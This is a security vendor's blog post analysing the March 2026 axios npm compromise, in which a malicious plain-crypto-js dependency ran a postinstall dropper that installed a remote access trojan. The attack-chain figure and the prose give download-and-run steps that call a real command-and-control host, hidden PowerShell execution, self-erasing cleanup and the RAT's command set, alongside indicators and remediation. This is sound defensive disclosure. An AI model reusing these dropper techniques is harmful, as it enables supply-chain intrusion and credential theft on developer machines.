None
<p>On March 30-31, 2026, threat actors published two malicious versions of the popular HTTP library axios (versions 1.14.1 and 0.30.4) to the npm registry. Both versions included a new dependency named plain-crypto-js which, in its 4.2.1 release, contained a fully-featured cross-platform dropper that silently installed a Remote Access Trojan (RAT) on developer machines. The packages have since been removed, and the axios team merged a deprecation workflow on March 31 to formally mark them as compromised on the registry. Any developer who ran npm install on the affected versions during the exposure window should assume their machine is compromised. We tracks this campaign as <strong>MSC-2026-3522.</strong></p><p>Axios has over 50 million weekly downloads. Even a brief window of exposure in a package of this scale represents serious supply chain risk, particularly given that developer laptops routinely hold SSH keys, cloud credentials, API tokens, and access to production systems.</p><h2 class="wp-block-heading" id="how-the-attack-was-deployed-npm-account-compromise">How the Attack Was Deployed: npm Account Compromise</h2><p>Versions 1.14.1 and 0.30.4 <strong>do not exist anywhere in the axios GitHub repository</strong>. There are no git tags, no commits, no release branches corresponding to these version numbers. The most recent legitimate release tag is v1.14.0, published March 27, 2026.</p><p>This means the attack did not involve compromising GitHub. The attacker obtained credentials for a maintainer’s npm account and used the npm CLI directly to publish packages, skipping the entire git-based release workflow. For developers who audit their dependencies by checking the GitHub repository, these versions would appear impossible to find.</p><p>One additional indicator of account compromise: the npm email address associated with the axios maintainer account was changed to <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b1d8d7c2c5d0c1f1c1c3dec5dedf9fdcd4">[email protected]</a> around the time of the malicious publish. This is consistent with an attacker updating account recovery details after gaining access to lock out the legitimate owner.</p><p>Community member ashishkurmi filed <a href="https://github.com/axios/axios/issues/10604" rel="noopener">issue #10604</a> on March 31, noting that related issues reporting the compromise were being deleted shortly after creation, suggesting the attacker may have retained some account access during the incident window.</p><p>The axios team responded quickly. On March 31, maintainer DigitalBrainJS merged <a href="https://github.com/axios/axios/pull/10591" rel="noopener">PR #10591</a>, adding a deprecate.yml GitHub Actions workflow that allows maintainers to manually trigger npm deprecate against a specified version. This marks the packages as deprecated in the registry and warns developers who attempt to install them.</p><pre class="wp-block-code"><code>name: Deprecate compromised axios version
on:
workflow_dispatch:
inputs:
version:
description: "Version of axios to deprecate (e.g. 1.14.1)"
required: true
default: "1.14.1"
jobs:
deprecate:
runs-on: ubuntu-latest
permissions:
contents: read
steps:
- name: Setup Node.js
uses: actions/setup-node@v4
with:
node-version: 20
registry-url: https://registry.npmjs.org
</code></pre><p><em>Figure 1: The deprecate.yml workflow added by the axios team (</em><a href="https://github.com/axios/axios/pull/10591" rel="noopener"><em>PR #10591</em></a><em>) to mark compromised versions on the npm registry.</em></p><h2 class="wp-block-heading" id="attack-overview">Attack Overview</h2><p>The attack starts with the axios package.json itself. Both malicious versions (1.14.1 and 0.30.4) were published with <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="f6869a979f98db95848f868299db9c85b6c2d8c4d8c7">[email protected]</a> listed as a new dependency. Any developer running npm install <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3b5a435254487b0a150a0f150a">[email protected]</a> would pull in that dependency automatically, with no additional action required. npm resolves and installs the full dependency tree silently.</p><p><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d4a4b8b5bdbaf9b7a6ada4a0bbf9bea794e0fae6fae5">[email protected]</a> is where the malicious code lives. The package carries a postinstall hook that fires the moment npm finishes installing it. From there, the chain runs in three stages:</p><ol class="wp-block-list">
<li>The postinstall hook runs setup.js, a heavily obfuscated JavaScript dropper bundled inside plain-crypto-js</li>
<li>The dropper detects the operating system, contacts a C2 (command-and-control) server, and downloads a platform-specific second-stage payload</li>
<li>On macOS, a compiled Mach-O RAT is dropped to /Library/Caches/com.apple.act.mond and starts beaconing to the attacker every 60 seconds; Windows and Linux have equivalent second-stage paths</li>
</ol><p>After the dropper finishes, it erases itself and replaces the package’s own package.json with a pre-staged clean copy that has no postinstall hook. A forensic inspection of the installed package after the fact reveals nothing suspicious.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="the-trojan-package-plain-crypto-js-v4-2-0-vs-v4-2-1">The Trojan Package: plain-crypto-js v4.2.0 vs v4.2.1</h2><p>Version 4.2.0 of plain-crypto-js is a clean, if unauthorized, repackaging of the well-known crypto-js library. It contains 53 files, all standard cryptographic primitives with no network calls or install hooks.</p><p>Version 4.2.1 added exactly three files. </p><figure class="wp-block-table">
<table class="has-fixed-layout">
<thead>
<tr>
<th><strong>File</strong></th>
<th><strong>Role</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>package.json</td>
<td>Modified: added “postinstall”: “node setup.js”</td>
</tr>
<tr>
<td>setup.js</td>
<td>New: the dropper (heavily obfuscated, ~3KB)</td>
</tr>
<tr>
<td>package.md</td>
<td>New: a clean copy of package.json without the postinstall entry, used for post-execution cleanup</td>
</tr>
</tbody>
</table>
</figure><p>The addition of package.md is a revealing detail. Its only purpose is to overwrite package.json after the dropper runs, eliminating the postinstall hook from the installed package. An engineer auditing dependencies after the infection would see a clean package with no hooks and no setup.js.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="the-dropper-three-platforms-one-script">The Dropper: Three Platforms, One Script</h2><p>setup.js is a single minified, heavily obfuscated JavaScript file that runs on install and handles macOS, Windows, and Linux with separate execution paths for each.</p><h3 class="wp-block-heading" id="obfuscation">Obfuscation</h3><p>Every sensitive value in the script, module names, file paths, OS identifiers, script content, and the C2 URL, is hidden inside an 18-entry encoded string array. None of these values are readable in the source. To recover them, each entry is reversed, has its base64 padding restored, is base64-decoded, and then passed through a custom XOR cipher keyed on “OrDeR_7077” with an additional constant of 333. The result looks like garbage on the wire but decodes cleanly to readable strings at runtime.</p><p>Decoding all 18 entries reveals the full picture: the three Node.js modules the dropper needs (fs, os, child_process), the C2 base URL (http://sfrclak.com:8000/), platform identifiers for each OS, the full script content dropped on each platform, the execution command for each, and the two filenames used in the post-run cleanup (package.json and package.md).</p><h3 class="wp-block-heading" id="what-the-dropper-does">What the dropper does</h3><p>On execution, the dropper first identifies the operating system, then constructs the full C2 URL by appending the hardcoded campaign ID 6202033 to the base URL, giving http://sfrclak.com:8000/6202033. From there it takes a different path depending on the platform.</p><p><strong>On macOS</strong>, it writes an AppleScript file to /tmp/6202033. That script contacts the C2 with a POST request whose body is packages.npm.org/product0, a value designed to look like legitimate npm registry traffic, and saves the response binary directly to /Library/Caches/com.apple.act.mond. It then sets the binary executable, runs it with zsh in the background, and removes the loader script. The parent dropper launches this AppleScript detached via nohup osascript, so the install process returns immediately without waiting.</p><p><strong>On Windows</strong>, the dropper first locates the PowerShell binary using where powershell, then copies it to %PROGRAMDATA%\wt.exe. The filename wt.exe is the Windows Terminal binary, chosen to blend in on a filesystem listing. It then writes a VBScript file to the temp directory that uses WScript.Shell to run a hidden cmd.exe window. That window curls the C2 for a PowerShell script (POST body: packages.npm.org/product1), saves it as a .ps1 file, and runs it using the copied PowerShell binary with -w hidden -ep bypass, suppressing any visible window and bypassing execution policy. After the PS1 runs, both temp files are deleted.</p><p><strong>On Linux</strong>, the path is the most direct: a single shell command downloads a Python script from the C2 (POST body: packages.npm.org/product2) to /tmp/ld.py and runs it with python3 under nohup, detached from the install process.</p><h3 class="wp-block-heading" id="self-destruction-and-cover-up">Self-destruction and cover-up</h3><p>After launching the platform payload, the dropper executes three cleanup steps in sequence. It deletes itself (setup.js). It deletes the current package.json, which contains the postinstall hook. It then renames package.md, the clean copy of package.json that was bundled into the package, back to package.json. The result is that the installed package directory contains no trace of the dropper, no postinstall hook, and no unexpected files. Any post-install audit of the package looks completely normal.</p><p>The campaign ID 6202033 is the only value hardcoded outside the obfuscated array. The C2 URL base is encoded, which means future campaigns can reuse the same dropper infrastructure by publishing a new version with a different encoded URL, the RAT binary itself never needs to change.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="the-macos-second-stage-a-full-remote-access-trojan">The macOS Second Stage: A Full Remote Access Trojan</h2><p>The payload served to macOS victims is a compiled Mach-O x86_64 binary dropped to /Library/Caches/com.apple.act.mond. The path is chosen to resemble a legitimate Apple daemon name. The binary is not signed with a valid certificate, but the dropper sidesteps this by running codesign –force –deep –sign – to apply an ad-hoc signature before execution, satisfying the basic signing requirement without a valid developer identity.</p><p><strong>SHA256:</strong> 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</p><p>The binary links against libcurl for C2 communication and nlohmann JSON for structured data handling. The C2 URL is not hardcoded; it is passed in as argv[1] by the AppleScript loader from the dropper. This design means the same compiled binary can be redeployed in future campaigns pointing to different infrastructure by simply changing the dropper.</p><h3 class="wp-block-heading" id="initial-beacon">Initial Beacon</h3><p>On first execution, the RAT collects a detailed system fingerprint and POSTs it to the C2 as a Base64-encoded JSON object.</p><pre class="wp-block-code"><code>{
"hostname": "macbook-pro.local",
"username": "jdoe",
"version": "14.4.1",
"timezone": "-5",
"installTimeString": "2023-09-15 09:22:11",
"currentTimeString": "2025-03-21 14:07:33",
"bootTimeString": "2025-03-20 08:11:02",
"cpuType": "mac_x64",
"modelName": "Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz",
"processList": "user pid command\njdoe 1234 /usr/bin/python3 ...",
"FirstInfo": "{ /Applications, ~/Library, ~/Application Support ... }"
}</code></pre><p><em>Figure 2: Initial beacon JSON structure sent to C2 on first execution.</em></p><p>The installTimeString is read from /var/db/.AppleSetupDone, a file that records when macOS was first configured. Combined with the full process list and directory tree, this initial beacon gives the operator a complete picture of the target: what software is installed, what is currently running, what credentials and config files are likely present.</p><p>All HTTP communication uses the User-Agent string mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0), which identifies as Internet Explorer 8 on Windows XP. This is anomalous for any macOS process and detectable in HTTP proxy logs.</p><h3 class="wp-block-heading" id="command-and-control-protocol">Command and Control Protocol</h3><p>After the initial beacon, the RAT polls the C2 server every 60 seconds via a GET request, waiting for commands. The operator can issue four command types:</p><p><strong>peinject</strong> receives a Base64-encoded binary payload, writes it to a randomly named hidden file under /private/tmp/, applies chmod 755, ad-hoc signs it with codesign –force –deep –sign -, and executes it with optional parameters. This is the highest-risk capability: it allows the operator to push and run any arbitrary program on the victim machine at any time.</p><p><strong>runscript</strong> executes arbitrary commands. If the Script field is empty, the Param field is passed directly to /bin/sh. If Script is populated, the Base64-decoded content is written to a temporary .scpt file and executed via /usr/bin/osascript. The latter enables GUI interactions, AppleScript-based keychain access, and dialog spoofing attacks.</p><p><strong>rundir</strong> triggers a deep enumeration of the filesystem, collecting file names, sizes, creation and modification timestamps, and directory structure.</p><p><strong>kill</strong> terminates the RAT process.</p><pre class="wp-block-code"><code>main() [0x100007A60]
GenerateUID() → random 16-char victim ID
GetOS() → macOS version string
InitDirInfo() → enumerate /Applications, ~/Library, ~/Application Support
Report() → POST initial beacon to C2
loop every 60s:
DoWork() → GET C2 for pending command
peinject → DoActionIjt() [0x100002ECE]
runscript → DoActionScpt() [0x1000042FE]
rundir → InitDirInfo() [0x1000070EF]
kill → exit
</code></pre><p><em>Figure 3: Core command dispatch loop in the macOS RAT, reconstructed from function signatures at the documented offsets. Full analysis by Joe DeSimone available at </em><a href="https://gist.github.com/joe-desimone/f9b205b6a5c2a826987e27b6ecc84c05" rel="noopener"><em>axios_macho_malware.md</em></a><em>.</em></p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="complete-attack-chain">Complete Attack Chain</h2><pre class="wp-block-code"><code>Developer runs: npm install <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="badbc2d3d5c9fa8b948b8e948b">[email protected]</a> (or 0.30.4)
Attacker published via compromised npm maintainer account
(No corresponding git tags in the axios GitHub repo)
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b5d4cddcdac6f5849b84819b84">[email protected]</a>
└── <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="384854595156155b4a41484c5715524b780c160a1609">[email protected]</a>
└── postinstall: node setup.js
│
├── [macOS]
│ AppleScript → curl POST packages.npm.org/product0
│ → /Library/Caches/com.apple.act.mond (chmod 770)
│ → nohup zsh "...act.mond http://sfrclak.com:8000/6202033"
│
├── [Windows]
│ copy powershell.exe → %PROGRAMDATA%\wt.exe
│ VBS → curl POST packages.npm.org/product1 → .ps1
│ → wt.exe -w hidden -ep bypass -file .ps1
│
└── [Linux]
curl POST packages.npm.org/product2 → /tmp/ld.py
→ nohup python3 /tmp/ld.py [C2 URL]
setup.js self-destructs:
unlink(setup.js)
unlink(package.json) ← removes postinstall hook
rename(package.md → package.json) ← package looks clean
RAT beacons every 60s to http://sfrclak.com:8000/6202033
→ operator can push binaries, run shell commands, enumerate files
</code></pre><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="impact-and-risk-assessment">Impact and Risk Assessment</h2><p>Developer machines are high-value targets. They typically hold SSH private keys, cloud provider credentials (AWS, GCP, Azure), npm and PyPI publish tokens, .env files for staging and production environments, database connection strings, and VPN certificates. A RAT with arbitrary command execution and binary injection on a developer workstation gives an attacker a persistent foothold that can propagate into production infrastructure.</p><p>The 60-second polling loop and the peinject capability mean that an attacker can adapt their intrusion over time. The initial payload may have been an infostealer or credential harvester. Days or weeks later, the same implant can receive a new binary with different capabilities.</p><p>CI/CD pipelines are an additional concern. Many organizations run npm install in automated build environments. If the affected axios versions were installed during a build window, the dropper would have run in the CI/CD context, with access to whatever secrets and permissions that environment holds.</p><p>The absence of git tags for the malicious versions also means dependency scanning tools that cross-reference npm packages against source repositories may have failed to flag anything unusual. The packages appeared to be valid axios releases by all metadata checks.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="timeline">Timeline</h2><figure class="wp-block-table">
<table class="has-fixed-layout">
<thead>
<tr>
<th><strong>Date/Time (UTC)</strong></th>
<th><strong>Event</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>March 27, 2026</td>
<td>axios v1.14.0 published legitimately to npm with corresponding git tag</td>
</tr>
<tr>
<td>March 30-31, 2026</td>
<td>Attacker publishes axios v1.14.1 and v0.30.4 via compromised npm account. npm maintainer email changed to <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c3aaa5b0b7a2b383b3b1acb7acadedaea6">[email protected]</a>. No git tags created. plain-crypto-js v4.2.1 included as dependency.</td>
</tr>
<tr>
<td>March 31, 01:38 UTC</td>
<td>axios maintainer merges <a href="https://github.com/axios/axios/pull/10591" rel="noopener">PR #10591</a> adding deprecate.yml workflow</td>
</tr>
<tr>
<td>March 31, 03:00 UTC</td>
<td>Community files <a href="https://github.com/axios/axios/issues/10604" rel="noopener">issue #10604</a> publicly reporting the compromise</td>
</tr>
<tr>
<td>March 31 (ongoing)</td>
<td>C2 at sfrclak.com:8000 goes offline. Deprecation of malicious versions in progress.</td>
</tr>
</tbody>
</table>
</figure><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="indicators-of-compromise">Indicators of Compromise</h2><h3 class="wp-block-heading" id="network">Network</h3><figure class="wp-block-table">
<table class="has-fixed-layout">
<thead>
<tr>
<th><strong>Indicator</strong></th>
<th><strong>Value</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>C2 domain</td>
<td>sfrclak.com</td>
</tr>
<tr>
<td>C2 IP</td>
<td>142.11.206.73</td>
</tr>
<tr>
<td>C2 port</td>
<td>8000</td>
</tr>
<tr>
<td>C2 URL</td>
<td>http://sfrclak.com:8000/6202033</td>
</tr>
<tr>
<td>User-Agent</td>
<td>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</td>
</tr>
<tr>
<td>macOS POST body</td>
<td>packages.npm.org/product0</td>
</tr>
<tr>
<td>Windows POST body</td>
<td>packages.npm.org/product1</td>
</tr>
<tr>
<td>Linux POST body</td>
<td>packages.npm.org/product2</td>
</tr>
</tbody>
</table>
</figure><h3 class="wp-block-heading" id="file-system">File System</h3><figure class="wp-block-table">
<table class="has-fixed-layout">
<thead>
<tr>
<th><strong>Indicator</strong></th>
<th><strong>Platform</strong></th>
<th><strong>Notes</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>/Library/Caches/com.apple.act.mond</td>
<td>macOS</td>
<td>RAT binary</td>
</tr>
<tr>
<td>/tmp/6202033</td>
<td>macOS</td>
<td>AppleScript loader, deleted after use</td>
</tr>
<tr>
<td>/private/tmp/.XXXXXX</td>
<td>macOS</td>
<td>Injected binaries from peinject commands</td>
</tr>
<tr>
<td>%PROGRAMDATA%\wt.exe</td>
<td>Windows</td>
<td>Cloned PowerShell binary</td>
</tr>
<tr>
<td>%TEMP%\6202033.vbs</td>
<td>Windows</td>
<td>VBS wrapper, deleted after use</td>
</tr>
<tr>
<td>%TEMP%\6202033.ps1</td>
<td>Windows</td>
<td>PS1 payload, deleted after use</td>
</tr>
<tr>
<td>/tmp/ld.py</td>
<td>Linux</td>
<td>Python stage-2 payload</td>
</tr>
</tbody>
</table>
</figure><h3 class="wp-block-heading" id="file-hashes-macos-rat">File Hashes (macOS RAT)</h3><figure class="wp-block-table">
<table class="has-fixed-layout">
<thead>
<tr>
<th><strong>Algorithm</strong></th>
<th><strong>Hash</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>SHA256</td>
<td>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</td>
</tr>
<tr>
<td>SHA1</td>
<td>13ab317c5dcab9af2d1bdb22118b9f09f8a4038e</td>
</tr>
<tr>
<td>MD5</td>
<td>7a9ddef00f69477b96252ca234fcbeeb</td>
</tr>
</tbody>
</table>
</figure><h3 class="wp-block-heading" id="process-and-behavioral">Process and Behavioral</h3><ul class="wp-block-list">
<li>codesign –force –deep –sign – invoked on a binary in /private/tmp/</li>
<li>ps -eo user,pid,command execution by a non-interactive process</li>
<li>osascript with a .scpt file in /tmp/</li>
<li>nohup launch of a file in /Library/Caches/ on macOS</li>
<li>PowerShell invoked with -w hidden -ep bypass from a non-shell parent process</li>
<li>Outbound HTTP POST to port 8000 with body resembling npm registry paths</li>
</ul><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="detection">Detection</h2><h3 class="wp-block-heading" id="npm-audit">npm Audit</h3><p>Check whether your project directly or transitively depends on plain-crypto-js at any version, and whether the affected axios versions were installed:</p><pre class="wp-block-code"><code>npm ls plain-crypto-js
cat package-lock.json | grep -A3 "plain-crypto-js"
# Check if either malicious version is in your lock file
grep -E '"axios".*"(1\.14\.1|0\.30\.4)"' package-lock.json
</code></pre><p><em>Figure 4: Commands to check for the malicious package in a Node.js project.</em></p><h3 class="wp-block-heading" id="network-detection">Network Detection</h3><p>Block or alert on outbound connections to sfrclak.com and 142.11.206.73:8000 at the firewall and DNS level. In proxy logs, alert on the User-Agent mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) from any non-Windows host, or from any host making POST requests to port 8000.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading" id="remediation">Remediation</h2><p><strong>If you installed axios 1.14.1 or 0.30.4:</strong></p><ol class="wp-block-list">
<li>Treat the machine as compromised. Do not use it to access sensitive credentials or production systems until it has been imaged and rebuilt.</li>
<li>Rotate all credentials that were accessible on the machine: SSH keys, cloud provider keys, npm tokens, .env secrets, API keys, database passwords.</li>
<li>Check for the persistence artifacts listed in the IOC table above. Presence of /Library/Caches/com.apple.act.mond on macOS or %PROGRAMDATA%\wt.exe on Windows confirms the second stage ran.</li>
<li>Review CI/CD logs for the affected time window. If any pipeline ran npm install with these versions, rotate all secrets used in that environment.</li>
<li>Check your package-lock.json for any reference to plain-crypto-js. If it is present, the package was resolved and the postinstall hook may have run.</li>
</ol><h2 class="wp-block-heading" id="conclusion">Conclusion</h2><p>This attack demonstrates how effective the npm account compromise is as an initial access vector. The malicious code required no GitHub access, no pull request, no code review bypass. A single stolen npm credential was enough to publish malicious packages under a trusted name with 50 million weekly downloads.</p><p>The macOS second stage is professionally written: a compiled C++ binary with structured C2 communication, four distinct operator capabilities including arbitrary binary injection, and architecture designed for infrastructure reuse. The Windows and Linux stages remain unconfirmed pending sample recovery.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/poisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install/" data-a2a-title="Poisoned Axios: npm Account Takeover, 50 Million Downloads, and a RAT That Vanishes After Install"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fpoisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install%2F&linkname=Poisoned%20Axios%3A%20npm%20Account%20Takeover%2C%2050%20Million%20Downloads%2C%20and%20a%20RAT%20That%20Vanishes%20After%20Install" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fpoisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install%2F&linkname=Poisoned%20Axios%3A%20npm%20Account%20Takeover%2C%2050%20Million%20Downloads%2C%20and%20a%20RAT%20That%20Vanishes%20After%20Install" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fpoisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install%2F&linkname=Poisoned%20Axios%3A%20npm%20Account%20Takeover%2C%2050%20Million%20Downloads%2C%20and%20a%20RAT%20That%20Vanishes%20After%20Install" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fpoisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install%2F&linkname=Poisoned%20Axios%3A%20npm%20Account%20Takeover%2C%2050%20Million%20Downloads%2C%20and%20a%20RAT%20That%20Vanishes%20After%20Install" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fpoisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install%2F&linkname=Poisoned%20Axios%3A%20npm%20Account%20Takeover%2C%2050%20Million%20Downloads%2C%20and%20a%20RAT%20That%20Vanishes%20After%20Install" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/poisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install/">https://www.mend.io/blog/poisoned-axios-npm-account-takeover-50-million-downloads-and-a-rat-that-vanishes-after-install/</a> </p>
.jpeg?trim=0,0,0,0&width=1200&height=800&crop=1200:800)
